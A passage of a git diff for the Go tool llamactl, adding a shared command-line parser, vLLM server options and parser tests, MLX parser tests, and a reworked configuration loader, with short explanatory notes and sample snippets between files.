command: "mlx_lm.server --model=/path/model --temp=0.7 --trust-remote-code",
expectErr: false,
},
{
name: "quoted strings",
command: `mlx_lm.server --model test.mlx --chat-template "User: {user}\nAssistant: "`,
expectErr: false,
},
{
name: "empty command",
command: "",
expectErr: true,
},
{
name: "unterminated quote",
command: `mlx_lm.server --model test.mlx --chat-template "unterminated`,
expectErr: true,
},
{
name: "malformed flag",
command: "mlx_lm.server ---model test.mlx",
expectErr: true,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
result, err := mlx.ParseMlxCommand(tt.command)
if tt.expectErr {
if err == nil {
t.Errorf("expected error but got none")
}
return
}
if err != nil {
t.Errorf("unexpected error: %v", err)
return
}
if result == nil {
t.Errorf("expected result but got nil")
}
})
}
}
func TestParseMlxCommandValues(t *testing.T) {
command := "mlx_lm.server --model /test/model.mlx --port 8080 --temp 0.7 --trust-remote-code --log-level DEBUG"
result, err := mlx.ParseMlxCommand(command)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if result.Model != "/test/model.mlx" {
t.Errorf("expected model '/test/model.mlx', got '%s'", result.Model)
}
if result.Port != 8080 {
t.Errorf("expected port 8080, got %d", result.Port)
}
if result.Temp != 0.7 {
t.Errorf("expected temp 0.7, got %f", result.Temp)
}
if !result.TrustRemoteCode {
t.Errorf("expected trust_remote_code to be true")
}
if result.LogLevel != "DEBUG" {
t.Errorf("expected log_level 'DEBUG', got '%s'", result.LogLevel)
}
}
func TestBuildCommandArgs(t *testing.T) {
options := &mlx.MlxServerOptions{
Model: "/test/model.mlx",
Host: "127.0.0.1",
Port: 8080,
Temp: 0.7,
TopP: 0.9,
TopK: 40,
MaxTokens: 2048,
TrustRemoteCode: true,
LogLevel: "DEBUG",
ChatTemplate: "custom template",
}
args := options.BuildCommandArgs()
// Check that all expected flags are present
expectedFlags := map[string]string{
"--model": "/test/model.mlx",
"--host": "127.0.0.1",
"--port": "8080",
"--log-level": "DEBUG",
"--chat-template": "custom template",
"--temp": "0.7",
"--top-p": "0.9",
"--top-k": "40",
"--max-tokens": "2048",
}
for i := 0; i < len(args); i++ {
if args[i] == "--trust-remote-code" {
continue // Boolean flag with no value
}
if args[i] == "--use-default-chat-template" {
continue // Boolean flag with no value
}
if expectedValue, exists := expectedFlags[args[i]]; exists && i+1 < len(args) {
if args[i+1] != expectedValue {
t.Errorf("expected %s to have value %s, got %s", args[i], expectedValue, args[i+1])
}
}
}
// Check boolean flags
foundTrustRemoteCode := false
for _, arg := range args {
if arg == "--trust-remote-code" {
foundTrustRemoteCode = true
}
}
if !foundTrustRemoteCode {
t.Errorf("expected --trust-remote-code flag to be present")
}
}

213
pkg/backends/parser.go Normal file
View File

@@ -0,0 +1,213 @@
package backends
import (
"encoding/json"
"fmt"
"path/filepath"
"regexp"
"strconv"
"strings"
)
// ParseCommand parses a command string into a target struct
func ParseCommand(command string, executableNames []string, subcommandNames []string, multiValuedFlags map[string]bool, target any) error {
// Normalize multiline commands
command = normalizeCommand(command)
if command == "" {
return fmt.Errorf("command cannot be empty")
}
// Extract arguments and positional model
args, modelFromPositional, err := extractArgs(command, executableNames, subcommandNames)
if err != nil {
return err
}
// Parse flags into map
options, err := parseFlags(args, multiValuedFlags)
if err != nil {
return err
}
// If we found a positional model and no --model flag was provided, set the model
if modelFromPositional != "" {
if _, hasModelFlag := options["model"]; !hasModelFlag {
options["model"] = modelFromPositional
}
}
// Convert to target struct via JSON
jsonData, err := json.Marshal(options)
if err != nil {
return fmt.Errorf("failed to marshal options: %w", err)
}
if err := json.Unmarshal(jsonData, target); err != nil {
return fmt.Errorf("failed to unmarshal to target: %w", err)
}
return nil
}
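
Because ParseCommand funnels the parsed flags through JSON, any struct with matching json tags can act as a target. A hypothetical sketch (exampleOptions and the my-server executable name are invented for illustration):

package backends_test

import (
    "llamactl/pkg/backends"
    "testing"
)

// exampleOptions is a hypothetical target; only the json tags matter, because
// ParseCommand marshals the parsed flag map to JSON and unmarshals it into the target.
type exampleOptions struct {
    Model   string `json:"model,omitempty"`
    Threads int    `json:"threads,omitempty"`
    Verbose bool   `json:"verbose,omitempty"`
}

func TestParseCommandSketch(t *testing.T) {
    var opts exampleOptions
    err := backends.ParseCommand(
        "my-server /models/tiny.gguf --threads 8 --verbose",
        []string{"my-server"}, // executable names to strip
        nil,                   // no subcommands
        map[string]bool{},     // no multi-valued flags
        &opts,
    )
    if err != nil {
        t.Fatal(err)
    }
    // The leading positional argument becomes the model since no --model flag was given.
    if opts.Model != "/models/tiny.gguf" || opts.Threads != 8 || !opts.Verbose {
        t.Errorf("unexpected result: %+v", opts)
    }
}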
// normalizeCommand handles multiline commands with backslashes
func normalizeCommand(command string) string {
re := regexp.MustCompile(`\\\s*\n\s*`)
normalized := re.ReplaceAllString(command, " ")
re = regexp.MustCompile(`\s+`)
return strings.TrimSpace(re.ReplaceAllString(normalized, " "))
}
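
For instance, a backslash-continued command collapses to a single line before tokenization; a small sketch (placed inside the backends package, since normalizeCommand is unexported):

package backends

import "fmt"

// exampleNormalize is a hypothetical helper illustrating normalizeCommand.
func exampleNormalize() {
    multiline := "llama-server \\\n  --model /models/tiny.gguf \\\n  --gpu-layers 16"
    fmt.Println(normalizeCommand(multiline))
    // Prints: llama-server --model /models/tiny.gguf --gpu-layers 16
}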
// extractArgs extracts arguments from command, removing executable and subcommands
// Returns: args, modelFromPositional, error
func extractArgs(command string, executableNames []string, subcommandNames []string) ([]string, string, error) {
// Check for unterminated quotes
if strings.Count(command, `"`)%2 != 0 || strings.Count(command, `'`)%2 != 0 {
return nil, "", fmt.Errorf("unterminated quoted string")
}
tokens := strings.Fields(command)
if len(tokens) == 0 {
return nil, "", fmt.Errorf("no tokens found")
}
// Skip executable
start := 0
firstToken := tokens[0]
// Check for executable name (with or without path)
if strings.Contains(firstToken, string(filepath.Separator)) {
baseName := filepath.Base(firstToken)
for _, execName := range executableNames {
if strings.HasSuffix(strings.ToLower(baseName), strings.ToLower(execName)) {
start = 1
break
}
}
} else {
for _, execName := range executableNames {
if strings.EqualFold(firstToken, execName) {
start = 1
break
}
}
}
// Skip subcommand if present
if start < len(tokens) {
for _, subCmd := range subcommandNames {
if strings.EqualFold(tokens[start], subCmd) {
start++
break
}
}
}
// Handle case where command starts with subcommand (no executable)
if start == 0 {
for _, subCmd := range subcommandNames {
if strings.EqualFold(firstToken, subCmd) {
start = 1
break
}
}
}
args := tokens[start:]
// Extract first positional argument (model) if present and not a flag
var modelFromPositional string
if len(args) > 0 && !strings.HasPrefix(args[0], "-") {
modelFromPositional = args[0]
args = args[1:] // Remove the model from args to process remaining flags
}
return args, modelFromPositional, nil
}
// parseFlags parses command line flags into a map
func parseFlags(args []string, multiValuedFlags map[string]bool) (map[string]any, error) {
options := make(map[string]any)
for i := 0; i < len(args); i++ {
arg := args[i]
if !strings.HasPrefix(arg, "-") {
continue
}
// Check for malformed flags (more than two leading dashes)
if strings.HasPrefix(arg, "---") {
return nil, fmt.Errorf("malformed flag: %s", arg)
}
// Get flag name and value
var flagName, value string
var hasValue bool
if strings.Contains(arg, "=") {
parts := strings.SplitN(arg, "=", 2)
flagName = strings.TrimLeft(parts[0], "-")
value = parts[1]
hasValue = true
} else {
flagName = strings.TrimLeft(arg, "-")
if i+1 < len(args) && !strings.HasPrefix(args[i+1], "-") {
value = args[i+1]
hasValue = true
i++ // Skip next arg since we consumed it
}
}
// Convert kebab-case to snake_case for JSON
flagName = strings.ReplaceAll(flagName, "-", "_")
if hasValue {
// Handle multi-valued flags
if multiValuedFlags[flagName] {
if existing, ok := options[flagName].([]string); ok {
options[flagName] = append(existing, value)
} else {
options[flagName] = []string{value}
}
} else {
options[flagName] = parseValue(value)
}
} else {
// Boolean flag
options[flagName] = true
}
}
return options, nil
}
// parseValue converts string to appropriate type
func parseValue(value string) any {
// Remove quotes
if len(value) >= 2 {
if (value[0] == '"' && value[len(value)-1] == '"') || (value[0] == '\'' && value[len(value)-1] == '\'') {
value = value[1 : len(value)-1]
}
}
// Try boolean
switch strings.ToLower(value) {
case "true":
return true
case "false":
return false
}
// Try integer
if intVal, err := strconv.Atoi(value); err == nil {
return intVal
}
// Try float
if floatVal, err := strconv.ParseFloat(value, 64); err == nil {
return floatVal
}
// Return as string
return value
}
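
Taken together, parseFlags and parseValue turn raw tokens into a typed map; a sketch of the expected shapes (again inside the backends package, since both helpers are unexported):

package backends

import "testing"

// TestParseFlagsSketch is an illustrative test, not part of the change above.
func TestParseFlagsSketch(t *testing.T) {
    args := []string{"--threads", "8", "--temp", "0.7", "--verbose", "--lora", "a.bin", "--lora=b.bin"}
    opts, err := parseFlags(args, map[string]bool{"lora": true})
    if err != nil {
        t.Fatal(err)
    }
    // Scalars are type-inferred: int, float64, bool.
    if opts["threads"] != 8 || opts["temp"] != 0.7 || opts["verbose"] != true {
        t.Errorf("unexpected scalar values: %v", opts)
    }
    // Multi-valued flags accumulate into a []string.
    if lora, ok := opts["lora"].([]string); !ok || len(lora) != 2 {
        t.Errorf("unexpected lora value: %v", opts["lora"])
    }
}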

200
pkg/backends/vllm/vllm.go Normal file
View File

@@ -0,0 +1,200 @@
package vllm
import (
"llamactl/pkg/backends"
)
// multiValuedFlags defines flags that should be repeated for each value rather than comma-separated
var multiValuedFlags = map[string]bool{
"api-key": true,
"allowed-origins": true,
"allowed-methods": true,
"allowed-headers": true,
"middleware": true,
}
type VllmServerOptions struct {
// Basic connection options (auto-assigned by llamactl)
Host string `json:"host,omitempty"`
Port int `json:"port,omitempty"`
// Model and engine configuration
Model string `json:"model,omitempty"`
Tokenizer string `json:"tokenizer,omitempty"`
SkipTokenizerInit bool `json:"skip_tokenizer_init,omitempty"`
Revision string `json:"revision,omitempty"`
CodeRevision string `json:"code_revision,omitempty"`
TokenizerRevision string `json:"tokenizer_revision,omitempty"`
TokenizerMode string `json:"tokenizer_mode,omitempty"`
TrustRemoteCode bool `json:"trust_remote_code,omitempty"`
DownloadDir string `json:"download_dir,omitempty"`
LoadFormat string `json:"load_format,omitempty"`
ConfigFormat string `json:"config_format,omitempty"`
Dtype string `json:"dtype,omitempty"`
KVCacheDtype string `json:"kv_cache_dtype,omitempty"`
QuantizationParamPath string `json:"quantization_param_path,omitempty"`
Seed int `json:"seed,omitempty"`
MaxModelLen int `json:"max_model_len,omitempty"`
GuidedDecodingBackend string `json:"guided_decoding_backend,omitempty"`
DistributedExecutorBackend string `json:"distributed_executor_backend,omitempty"`
WorkerUseRay bool `json:"worker_use_ray,omitempty"`
RayWorkersUseNSight bool `json:"ray_workers_use_nsight,omitempty"`
// Performance and serving configuration
BlockSize int `json:"block_size,omitempty"`
EnablePrefixCaching bool `json:"enable_prefix_caching,omitempty"`
DisableSlidingWindow bool `json:"disable_sliding_window,omitempty"`
UseV2BlockManager bool `json:"use_v2_block_manager,omitempty"`
NumLookaheadSlots int `json:"num_lookahead_slots,omitempty"`
SwapSpace int `json:"swap_space,omitempty"`
CPUOffloadGB int `json:"cpu_offload_gb,omitempty"`
GPUMemoryUtilization float64 `json:"gpu_memory_utilization,omitempty"`
NumGPUBlocksOverride int `json:"num_gpu_blocks_override,omitempty"`
MaxNumBatchedTokens int `json:"max_num_batched_tokens,omitempty"`
MaxNumSeqs int `json:"max_num_seqs,omitempty"`
MaxLogprobs int `json:"max_logprobs,omitempty"`
DisableLogStats bool `json:"disable_log_stats,omitempty"`
Quantization string `json:"quantization,omitempty"`
RopeScaling string `json:"rope_scaling,omitempty"`
RopeTheta float64 `json:"rope_theta,omitempty"`
EnforceEager bool `json:"enforce_eager,omitempty"`
MaxContextLenToCapture int `json:"max_context_len_to_capture,omitempty"`
MaxSeqLenToCapture int `json:"max_seq_len_to_capture,omitempty"`
DisableCustomAllReduce bool `json:"disable_custom_all_reduce,omitempty"`
TokenizerPoolSize int `json:"tokenizer_pool_size,omitempty"`
TokenizerPoolType string `json:"tokenizer_pool_type,omitempty"`
TokenizerPoolExtraConfig string `json:"tokenizer_pool_extra_config,omitempty"`
EnableLoraBias bool `json:"enable_lora_bias,omitempty"`
LoraExtraVocabSize int `json:"lora_extra_vocab_size,omitempty"`
LoraRank int `json:"lora_rank,omitempty"`
PromptLookbackDistance int `json:"prompt_lookback_distance,omitempty"`
PreemptionMode string `json:"preemption_mode,omitempty"`
// Distributed and parallel processing
TensorParallelSize int `json:"tensor_parallel_size,omitempty"`
PipelineParallelSize int `json:"pipeline_parallel_size,omitempty"`
MaxParallelLoadingWorkers int `json:"max_parallel_loading_workers,omitempty"`
DisableAsyncOutputProc bool `json:"disable_async_output_proc,omitempty"`
WorkerClass string `json:"worker_class,omitempty"`
EnabledLoraModules string `json:"enabled_lora_modules,omitempty"`
MaxLoraRank int `json:"max_lora_rank,omitempty"`
FullyShardedLoras bool `json:"fully_sharded_loras,omitempty"`
LoraModules string `json:"lora_modules,omitempty"`
PromptAdapters string `json:"prompt_adapters,omitempty"`
MaxPromptAdapterToken int `json:"max_prompt_adapter_token,omitempty"`
Device string `json:"device,omitempty"`
SchedulerDelay float64 `json:"scheduler_delay,omitempty"`
EnableChunkedPrefill bool `json:"enable_chunked_prefill,omitempty"`
SpeculativeModel string `json:"speculative_model,omitempty"`
SpeculativeModelQuantization string `json:"speculative_model_quantization,omitempty"`
SpeculativeRevision string `json:"speculative_revision,omitempty"`
SpeculativeMaxModelLen int `json:"speculative_max_model_len,omitempty"`
SpeculativeDisableByBatchSize int `json:"speculative_disable_by_batch_size,omitempty"`
NgptSpeculativeLength int `json:"ngpt_speculative_length,omitempty"`
SpeculativeDisableMqa bool `json:"speculative_disable_mqa,omitempty"`
ModelLoaderExtraConfig string `json:"model_loader_extra_config,omitempty"`
IgnorePatterns string `json:"ignore_patterns,omitempty"`
PreloadedLoraModules string `json:"preloaded_lora_modules,omitempty"`
// OpenAI server specific options
UDS string `json:"uds,omitempty"`
UvicornLogLevel string `json:"uvicorn_log_level,omitempty"`
ResponseRole string `json:"response_role,omitempty"`
SSLKeyfile string `json:"ssl_keyfile,omitempty"`
SSLCertfile string `json:"ssl_certfile,omitempty"`
SSLCACerts string `json:"ssl_ca_certs,omitempty"`
SSLCertReqs int `json:"ssl_cert_reqs,omitempty"`
RootPath string `json:"root_path,omitempty"`
Middleware []string `json:"middleware,omitempty"`
ReturnTokensAsTokenIDS bool `json:"return_tokens_as_token_ids,omitempty"`
DisableFrontendMultiprocessing bool `json:"disable_frontend_multiprocessing,omitempty"`
EnableAutoToolChoice bool `json:"enable_auto_tool_choice,omitempty"`
ToolCallParser string `json:"tool_call_parser,omitempty"`
ToolServer string `json:"tool_server,omitempty"`
ChatTemplate string `json:"chat_template,omitempty"`
ChatTemplateContentFormat string `json:"chat_template_content_format,omitempty"`
AllowCredentials bool `json:"allow_credentials,omitempty"`
AllowedOrigins []string `json:"allowed_origins,omitempty"`
AllowedMethods []string `json:"allowed_methods,omitempty"`
AllowedHeaders []string `json:"allowed_headers,omitempty"`
APIKey []string `json:"api_key,omitempty"`
EnableLogOutputs bool `json:"enable_log_outputs,omitempty"`
EnableTokenUsage bool `json:"enable_token_usage,omitempty"`
EnableAsyncEngineDebug bool `json:"enable_async_engine_debug,omitempty"`
EngineUseRay bool `json:"engine_use_ray,omitempty"`
DisableLogRequests bool `json:"disable_log_requests,omitempty"`
MaxLogLen int `json:"max_log_len,omitempty"`
// Additional engine configuration
Task string `json:"task,omitempty"`
MultiModalConfig string `json:"multi_modal_config,omitempty"`
LimitMmPerPrompt string `json:"limit_mm_per_prompt,omitempty"`
EnableSleepMode bool `json:"enable_sleep_mode,omitempty"`
EnableChunkingRequest bool `json:"enable_chunking_request,omitempty"`
CompilationConfig string `json:"compilation_config,omitempty"`
DisableSlidingWindowMask bool `json:"disable_sliding_window_mask,omitempty"`
EnableTRTLLMEngineLatency bool `json:"enable_trtllm_engine_latency,omitempty"`
OverridePoolingConfig string `json:"override_pooling_config,omitempty"`
OverrideNeuronConfig string `json:"override_neuron_config,omitempty"`
OverrideKVCacheALIGNSize int `json:"override_kv_cache_align_size,omitempty"`
}
// BuildCommandArgs converts VllmServerOptions to command line arguments
// For vLLM native, model is a positional argument after "serve"
func (o *VllmServerOptions) BuildCommandArgs() []string {
var args []string
// Add model as positional argument if specified (for native execution)
if o.Model != "" {
args = append(args, o.Model)
}
// Create a copy without Model field to avoid --model flag
optionsCopy := *o
optionsCopy.Model = ""
// Use package-level multipleFlags variable
flagArgs := backends.BuildCommandArgs(&optionsCopy, multiValuedFlags)
args = append(args, flagArgs...)
return args
}
func (o *VllmServerOptions) BuildDockerArgs() []string {
var args []string
// Use package-level multipleFlags variable
flagArgs := backends.BuildCommandArgs(o, multiValuedFlags)
args = append(args, flagArgs...)
return args
}
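
The difference between the two builders is only where the model goes: BuildCommandArgs emits it as the positional argument expected by a native "vllm serve", while BuildDockerArgs keeps it as a --model flag. A rough sketch (flag order follows struct field order, so the output shown is illustrative):

package main

import (
    "fmt"
    "llamactl/pkg/backends/vllm"
)

func main() {
    opts := &vllm.VllmServerOptions{
        Model:                "microsoft/DialoGPT-medium",
        GPUMemoryUtilization: 0.8,
    }
    // Native execution: model is positional, roughly
    // [microsoft/DialoGPT-medium --gpu-memory-utilization 0.8]
    fmt.Println(opts.BuildCommandArgs())
    // Docker execution: model stays a flag, roughly
    // [--model microsoft/DialoGPT-medium --gpu-memory-utilization 0.8]
    fmt.Println(opts.BuildDockerArgs())
}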
// ParseVllmCommand parses a vLLM serve command string into VllmServerOptions
// Supports multiple formats:
// 1. Full command: "vllm serve --model MODEL_NAME --other-args"
// 2. Full path: "/usr/local/bin/vllm serve --model MODEL_NAME"
// 3. Serve only: "serve --model MODEL_NAME --other-args"
// 4. Args only: "--model MODEL_NAME --other-args"
// 5. Multiline commands with backslashes
func ParseVllmCommand(command string) (*VllmServerOptions, error) {
executableNames := []string{"vllm"}
subcommandNames := []string{"serve"}
multiValuedFlags := map[string]bool{
"middleware": true,
"api_key": true,
"allowed_origins": true,
"allowed_methods": true,
"allowed_headers": true,
"lora_modules": true,
"prompt_adapters": true,
}
var vllmOptions VllmServerOptions
if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &vllmOptions); err != nil {
return nil, err
}
return &vllmOptions, nil
}

View File

@@ -0,0 +1,153 @@
package vllm_test
import (
"llamactl/pkg/backends/vllm"
"slices"
"testing"
)
func TestParseVllmCommand(t *testing.T) {
tests := []struct {
name string
command string
expectErr bool
}{
{
name: "basic vllm serve command",
command: "vllm serve microsoft/DialoGPT-medium",
expectErr: false,
},
{
name: "serve only command",
command: "serve microsoft/DialoGPT-medium",
expectErr: false,
},
{
name: "positional model with flags",
command: "vllm serve microsoft/DialoGPT-medium --tensor-parallel-size 2",
expectErr: false,
},
{
name: "model with path",
command: "vllm serve /path/to/model --gpu-memory-utilization 0.8",
expectErr: false,
},
{
name: "empty command",
command: "",
expectErr: true,
},
{
name: "unterminated quote",
command: `vllm serve "unterminated`,
expectErr: true,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
result, err := vllm.ParseVllmCommand(tt.command)
if tt.expectErr {
if err == nil {
t.Errorf("expected error but got none")
}
return
}
if err != nil {
t.Errorf("unexpected error: %v", err)
return
}
if result == nil {
t.Errorf("expected result but got nil")
}
})
}
}
func TestParseVllmCommandValues(t *testing.T) {
command := "vllm serve test-model --tensor-parallel-size 4 --gpu-memory-utilization 0.8 --enable-log-outputs"
result, err := vllm.ParseVllmCommand(command)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if result.Model != "test-model" {
t.Errorf("expected model 'test-model', got '%s'", result.Model)
}
if result.TensorParallelSize != 4 {
t.Errorf("expected tensor_parallel_size 4, got %d", result.TensorParallelSize)
}
if result.GPUMemoryUtilization != 0.8 {
t.Errorf("expected gpu_memory_utilization 0.8, got %f", result.GPUMemoryUtilization)
}
if !result.EnableLogOutputs {
t.Errorf("expected enable_log_outputs true, got %v", result.EnableLogOutputs)
}
}
func TestBuildCommandArgs(t *testing.T) {
options := vllm.VllmServerOptions{
Model: "microsoft/DialoGPT-medium",
Port: 8080,
Host: "localhost",
TensorParallelSize: 2,
GPUMemoryUtilization: 0.8,
EnableLogOutputs: true,
AllowedOrigins: []string{"http://localhost:3000", "https://example.com"},
}
args := options.BuildCommandArgs()
// Check that model is the first positional argument (not a --model flag)
if len(args) == 0 || args[0] != "microsoft/DialoGPT-medium" {
t.Errorf("Expected model 'microsoft/DialoGPT-medium' as first positional argument, got args: %v", args)
}
// Check that --model flag is NOT present (since model should be positional)
if contains(args, "--model") {
t.Errorf("Found --model flag, but model should be positional argument in args: %v", args)
}
// Check other flags
if !containsFlagWithValue(args, "--tensor-parallel-size", "2") {
t.Errorf("Expected --tensor-parallel-size 2 not found in %v", args)
}
if !contains(args, "--enable-log-outputs") {
t.Errorf("Expected --enable-log-outputs not found in %v", args)
}
if !contains(args, "--host") {
t.Errorf("Expected --host not found in %v", args)
}
if !contains(args, "--port") {
t.Errorf("Expected --port not found in %v", args)
}
// Check array handling (multiple flags)
allowedOriginsCount := 0
for i := range args {
if args[i] == "--allowed-origins" {
allowedOriginsCount++
}
}
if allowedOriginsCount != 2 {
t.Errorf("Expected 2 --allowed-origins flags, got %d", allowedOriginsCount)
}
}
// Helper functions
func contains(slice []string, item string) bool {
return slices.Contains(slice, item)
}
func containsFlagWithValue(args []string, flag, value string) bool {
for i, arg := range args {
if arg == flag && i+1 < len(args) && args[i+1] == value {
return true
}
}
return false
}

View File

@@ -1,295 +0,0 @@
package llamactl
import (
"os"
"path/filepath"
"runtime"
"strconv"
"strings"
"gopkg.in/yaml.v3"
)
// Config represents the configuration for llamactl
type Config struct {
Server ServerConfig `yaml:"server"`
Instances InstancesConfig `yaml:"instances"`
Auth AuthConfig `yaml:"auth"`
}
// ServerConfig contains HTTP server configuration
type ServerConfig struct {
// Server host to bind to
Host string `yaml:"host"`
// Server port to bind to
Port int `yaml:"port"`
// Allowed origins for CORS (e.g., "http://localhost:3000")
AllowedOrigins []string `yaml:"allowed_origins"`
// Enable Swagger UI for API documentation
EnableSwagger bool `yaml:"enable_swagger"`
}
// InstancesConfig contains instance management configuration
type InstancesConfig struct {
// Port range for instances (e.g., 8000,9000)
PortRange [2]int `yaml:"port_range"`
// Directory where instance logs will be stored
LogDirectory string `yaml:"log_directory"`
// Maximum number of instances that can be created
MaxInstances int `yaml:"max_instances"`
// Path to llama-server executable
LlamaExecutable string `yaml:"llama_executable"`
// Default auto-restart setting for new instances
DefaultAutoRestart bool `yaml:"default_auto_restart"`
// Default max restarts for new instances
DefaultMaxRestarts int `yaml:"default_max_restarts"`
// Default restart delay for new instances (in seconds)
DefaultRestartDelay int `yaml:"default_restart_delay"`
}
// AuthConfig contains authentication settings
type AuthConfig struct {
// Require authentication for OpenAI compatible inference endpoints
RequireInferenceAuth bool `yaml:"require_inference_auth"`
// List of keys for OpenAI compatible inference endpoints
InferenceKeys []string `yaml:"inference_keys"`
// Require authentication for management endpoints
RequireManagementAuth bool `yaml:"require_management_auth"`
// List of keys for management endpoints
ManagementKeys []string `yaml:"management_keys"`
}
// LoadConfig loads configuration with the following precedence:
// 1. Hardcoded defaults
// 2. Config file
// 3. Environment variables
func LoadConfig(configPath string) (Config, error) {
// 1. Start with defaults
cfg := Config{
Server: ServerConfig{
Host: "0.0.0.0",
Port: 8080,
AllowedOrigins: []string{"*"}, // Default to allow all origins
EnableSwagger: false,
},
Instances: InstancesConfig{
PortRange: [2]int{8000, 9000},
LogDirectory: "/tmp/llamactl",
MaxInstances: -1, // -1 means unlimited
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
},
Auth: AuthConfig{
RequireInferenceAuth: true,
InferenceKeys: []string{},
RequireManagementAuth: true,
ManagementKeys: []string{},
},
}
// 2. Load from config file
if err := loadConfigFile(&cfg, configPath); err != nil {
return cfg, err
}
// 3. Override with environment variables
loadEnvVars(&cfg)
return cfg, nil
}
// loadConfigFile attempts to load config from file with fallback locations
func loadConfigFile(cfg *Config, configPath string) error {
var configLocations []string
// If specific config path provided, use only that
if configPath != "" {
configLocations = []string{configPath}
} else {
// Default config file locations (in order of precedence)
configLocations = getDefaultConfigLocations()
}
for _, path := range configLocations {
if data, err := os.ReadFile(path); err == nil {
if err := yaml.Unmarshal(data, cfg); err != nil {
return err
}
return nil
}
}
return nil
}
// loadEnvVars overrides config with environment variables
func loadEnvVars(cfg *Config) {
// Server config
if host := os.Getenv("LLAMACTL_HOST"); host != "" {
cfg.Server.Host = host
}
if port := os.Getenv("LLAMACTL_PORT"); port != "" {
if p, err := strconv.Atoi(port); err == nil {
cfg.Server.Port = p
}
}
if allowedOrigins := os.Getenv("LLAMACTL_ALLOWED_ORIGINS"); allowedOrigins != "" {
cfg.Server.AllowedOrigins = strings.Split(allowedOrigins, ",")
}
if enableSwagger := os.Getenv("LLAMACTL_ENABLE_SWAGGER"); enableSwagger != "" {
if b, err := strconv.ParseBool(enableSwagger); err == nil {
cfg.Server.EnableSwagger = b
}
}
// Instance config
if portRange := os.Getenv("LLAMACTL_INSTANCE_PORT_RANGE"); portRange != "" {
if ports := ParsePortRange(portRange); ports != [2]int{0, 0} {
cfg.Instances.PortRange = ports
}
}
if logDir := os.Getenv("LLAMACTL_LOG_DIR"); logDir != "" {
cfg.Instances.LogDirectory = logDir
}
if maxInstances := os.Getenv("LLAMACTL_MAX_INSTANCES"); maxInstances != "" {
if m, err := strconv.Atoi(maxInstances); err == nil {
cfg.Instances.MaxInstances = m
}
}
if llamaExec := os.Getenv("LLAMACTL_LLAMA_EXECUTABLE"); llamaExec != "" {
cfg.Instances.LlamaExecutable = llamaExec
}
if autoRestart := os.Getenv("LLAMACTL_DEFAULT_AUTO_RESTART"); autoRestart != "" {
if b, err := strconv.ParseBool(autoRestart); err == nil {
cfg.Instances.DefaultAutoRestart = b
}
}
if maxRestarts := os.Getenv("LLAMACTL_DEFAULT_MAX_RESTARTS"); maxRestarts != "" {
if m, err := strconv.Atoi(maxRestarts); err == nil {
cfg.Instances.DefaultMaxRestarts = m
}
}
if restartDelay := os.Getenv("LLAMACTL_DEFAULT_RESTART_DELAY"); restartDelay != "" {
if seconds, err := strconv.Atoi(restartDelay); err == nil {
cfg.Instances.DefaultRestartDelay = seconds
}
}
// Auth config
if requireInferenceAuth := os.Getenv("LLAMACTL_REQUIRE_INFERENCE_AUTH"); requireInferenceAuth != "" {
if b, err := strconv.ParseBool(requireInferenceAuth); err == nil {
cfg.Auth.RequireInferenceAuth = b
}
}
if inferenceKeys := os.Getenv("LLAMACTL_INFERENCE_KEYS"); inferenceKeys != "" {
cfg.Auth.InferenceKeys = strings.Split(inferenceKeys, ",")
}
if requireManagementAuth := os.Getenv("LLAMACTL_REQUIRE_MANAGEMENT_AUTH"); requireManagementAuth != "" {
if b, err := strconv.ParseBool(requireManagementAuth); err == nil {
cfg.Auth.RequireManagementAuth = b
}
}
if managementKeys := os.Getenv("LLAMACTL_MANAGEMENT_KEYS"); managementKeys != "" {
cfg.Auth.ManagementKeys = strings.Split(managementKeys, ",")
}
}
// ParsePortRange parses port range from string formats like "8000-9000" or "8000,9000"
func ParsePortRange(s string) [2]int {
var parts []string
// Try both separators
if strings.Contains(s, "-") {
parts = strings.Split(s, "-")
} else if strings.Contains(s, ",") {
parts = strings.Split(s, ",")
}
// Parse the two parts
if len(parts) == 2 {
start, err1 := strconv.Atoi(strings.TrimSpace(parts[0]))
end, err2 := strconv.Atoi(strings.TrimSpace(parts[1]))
if err1 == nil && err2 == nil {
return [2]int{start, end}
}
}
return [2]int{0, 0} // Invalid format
}
// getDefaultConfigLocations returns platform-specific config file locations
func getDefaultConfigLocations() []string {
var locations []string
// Current directory (cross-platform)
locations = append(locations,
"./llamactl.yaml",
"./config.yaml",
)
homeDir, _ := os.UserHomeDir()
switch runtime.GOOS {
case "windows":
// Windows: Use APPDATA and ProgramData
if appData := os.Getenv("APPDATA"); appData != "" {
locations = append(locations, filepath.Join(appData, "llamactl", "config.yaml"))
}
if programData := os.Getenv("PROGRAMDATA"); programData != "" {
locations = append(locations, filepath.Join(programData, "llamactl", "config.yaml"))
}
// Fallback to user home
if homeDir != "" {
locations = append(locations, filepath.Join(homeDir, "llamactl", "config.yaml"))
}
case "darwin":
// macOS: Use proper Application Support directories
if homeDir != "" {
locations = append(locations,
filepath.Join(homeDir, "Library", "Application Support", "llamactl", "config.yaml"),
filepath.Join(homeDir, ".config", "llamactl", "config.yaml"), // XDG fallback
)
}
locations = append(locations, "/Library/Application Support/llamactl/config.yaml")
locations = append(locations, "/etc/llamactl/config.yaml") // Unix fallback
default:
// User config: $XDG_CONFIG_HOME/llamactl/config.yaml or ~/.config/llamactl/config.yaml
configHome := os.Getenv("XDG_CONFIG_HOME")
if configHome == "" && homeDir != "" {
configHome = filepath.Join(homeDir, ".config")
}
if configHome != "" {
locations = append(locations, filepath.Join(configHome, "llamactl", "config.yaml"))
}
// System config: /etc/llamactl/config.yaml
locations = append(locations, "/etc/llamactl/config.yaml")
// Additional system locations
if xdgConfigDirs := os.Getenv("XDG_CONFIG_DIRS"); xdgConfigDirs != "" {
for dir := range strings.SplitSeq(xdgConfigDirs, ":") {
if dir != "" {
locations = append(locations, filepath.Join(dir, "llamactl", "config.yaml"))
}
}
}
}
return locations
}

562
pkg/config/config.go Normal file
View File

@@ -0,0 +1,562 @@
package config
import (
"log"
"os"
"path/filepath"
"runtime"
"strconv"
"strings"
"gopkg.in/yaml.v3"
)
// BackendSettings contains structured backend configuration
type BackendSettings struct {
Command string `yaml:"command"`
Args []string `yaml:"args"`
Environment map[string]string `yaml:"environment,omitempty"`
Docker *DockerSettings `yaml:"docker,omitempty"`
}
// DockerSettings contains Docker-specific configuration
